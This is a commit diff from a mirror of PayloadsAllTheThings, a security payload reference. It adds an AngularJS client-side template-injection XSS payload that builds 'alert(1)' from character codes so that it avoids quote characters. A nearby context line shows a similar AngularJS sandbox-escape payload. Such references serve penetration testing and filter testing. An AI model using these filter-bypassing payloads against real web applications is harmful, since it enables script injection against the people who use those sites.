mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Merge pull request #233 from virenpawar/patch-1
[Update] Added 1 payload
This commit is contained in:
commit
d386790fd2
@ -149,6 +149,14 @@ AngularJS 1.0.1 - 1.1.5 and Vue JS
|
||||
{{constructor.constructor('alert(1)')()}}
|
||||
```
|
||||
|
||||
### Advanced bypassing XSS
|
||||
|
||||
AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter.com/VirenPawar_)
|
||||
|
||||
```javascript
|
||||
{{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}
|
||||
```
|
||||
|
||||
|
||||
### Blind XSS
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user